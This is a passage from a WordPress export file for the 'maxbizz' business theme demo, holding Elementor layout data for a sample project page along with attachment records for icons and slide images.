2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"1ccebcb3","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5c6af9ae","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"2ea1549b","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"2bb4ff92","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"40167225","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"7125fb7b","elType":"section","settings":[],"elements":[{"id":"2292e976","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"74a4f2ef","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6b6408db","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7a6fb144","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"4359b052","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"5695beea","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"d323896","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"6c607602","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"524b70b7","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7a5ae6ff","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2bf4429e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"79862618","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"255cbb6f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"d7135a4","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"38949894","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7af2ac6e","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"22153473","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"2b9fdc68","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2a136c0a","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"199198b4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"66dcf71a","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #ff8523;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"18b9835e","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"5aa06968","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project.png","id":784},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"4283666a","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>maxbizz</title>
		<link>http://wpdemo.archiwp.com/maxbizz/maxbizz/</link>
		<pubDate>Fri, 02 Oct 2020 03:26:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/maxbizz/</guid>
		<description></description>
		<content:encoded><![CDATA[.post-box .post-inner{
	margin-bottom: 30px;
}]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1210</wp:post_id>
		<wp:post_date><![CDATA[2020-10-02 03:26:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-02 03:26:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[maxbizz]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[custom_css]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														</item>
					<item>
		<title>pin</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_footer_builders/footer-1/pin/</link>
		<pubDate>Mon, 07 Dec 2020 09:01:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pin.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1419</wp:post_id>
		<wp:post_date><![CDATA[2020-12-07 09:01:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-07 09:01:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pin]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>300</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pin.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/pin.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>call</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_footer_builders/footer-1/call/</link>
		<pubDate>Mon, 07 Dec 2020 09:02:10 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/call.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1420</wp:post_id>
		<wp:post_date><![CDATA[2020-12-07 09:02:10]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-07 09:02:10]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[call]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>300</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/call.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/call.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>slide1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/slide1/</link>
		<pubDate>Tue, 08 Dec 2020 03:03:50 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/slide1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1448</wp:post_id>
		<wp:post_date><![CDATA[2020-12-08 03:03:50]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-08 03:03:50]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[slide1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/slide1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/slide1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:820;s:4:"file";s:18:"2020/12/slide1.jpg";s:5:"sizes";a:15:{s:6:"medium";a:4:{s:4:"file";s:18:"slide1-300x128.jpg";s:5:"width";i:300;s:6:"height";i:128;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:19:"slide1-1024x437.jpg";s:5:"width";i:1024;s:6:"height";i:437;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:18:"slide1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"slide1-768x328.jpg";s:5:"width";i:768;s:6:"height";i:328;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:19:"slide1-1536x656.jpg";s:5:"width";i:1536;s:6:"height";i:656;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:18:"slide1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:18:"slide1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"slide1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:19:"slide1-1200x820.jpg";s:5:"width";i:1200;s:6:"height";i:820;s:9:"mime-type";s:10:"image/jpeg";}s:21:"woocommerce_thumbnail";a:5:{s:4:"file";s:18:"slide1-300x128.jpg";s:5:"width";i:300;s:6:"height";i:128;s:9:"mime-type";s:10:"image/jpeg";s:9:"uncropped";b:1;}s:18:"woocommerce_single";a:4:{s:4:"file";s:18:"slide1-600x256.jpg";s:5:"width";i:600;s:6:"height";i:256;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:18:"slide1-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"slide1-300x128.jpg";s:5:"width";i:300;s:6:"height";i:128;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"slide1-600x256.jpg";s:5:"width";i:600;s:6:"height";i:256;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"slide1-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>slide2</title>
		<link>http://wpdemo.archiwp.com/maxbizz/slide2/</link>
		<pubDate>Tue, 08 Dec 2020 03:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/slide2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1449</wp:post_id>
		<wp:post_date><![CDATA[2020-12-08 03:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-08 03:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[slide2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/slide2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/slide2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:820;s:4:"file";s:18:"2020/12/slide2.jpg";s:5:"sizes";a:15:{s:6:"medium";a:4:{s:4:"file";s:18:"slide2-300x128.jpg";s:5:"width";i:300;s:6:"height";i:128;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:19:"slide2-1024x437.jpg";s:5:"width";i:1024;s:6:"height";i:437;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:18:"slide2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"slide2-768x328.jpg";s:5:"width";i:768;s:6:"height";i:328;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:19:"slide2-1536x656.jpg";s:5:"width";i:1536;s:6:"height";i:656;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:18:"slide2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:18:"slide2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"slide2-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:19:"slide2-1200x820.jpg";s:5:"width";i:1200;s:6:"height";i:820;s:9:"mime-type";s:10:"image/jpeg";}s:21:"woocommerce_thumbnail";a:5:{s:4:"file";s:18:"slide2-300x128.jpg";s:5:"width";i:300;s:6:"height";i:128;s:9:"mime-type";s:10:"image/jpeg";s:9:"uncropped";b:1;}s:18:"woocommerce_single";a:4:{s:4:"file";s:18:"slide2-600x256.jpg";s:5:"width";i:600;s:6:"height";i:256;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:18:"slide2-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"slide2-300x128.jpg";s:5:"width";i:300;s:6:"height";i:128;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"slide2-600x256.jpg";s:5:"width";i:600;s:6:"height";i:256;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"slide2-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>slide3</title>
		<link>http://wpdemo.archiwp.com/maxbizz/slide3/</link>
		<pubDate>Tue, 08 Dec 2020 03:04:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/slide3.jpg</guid>
		<description></description>
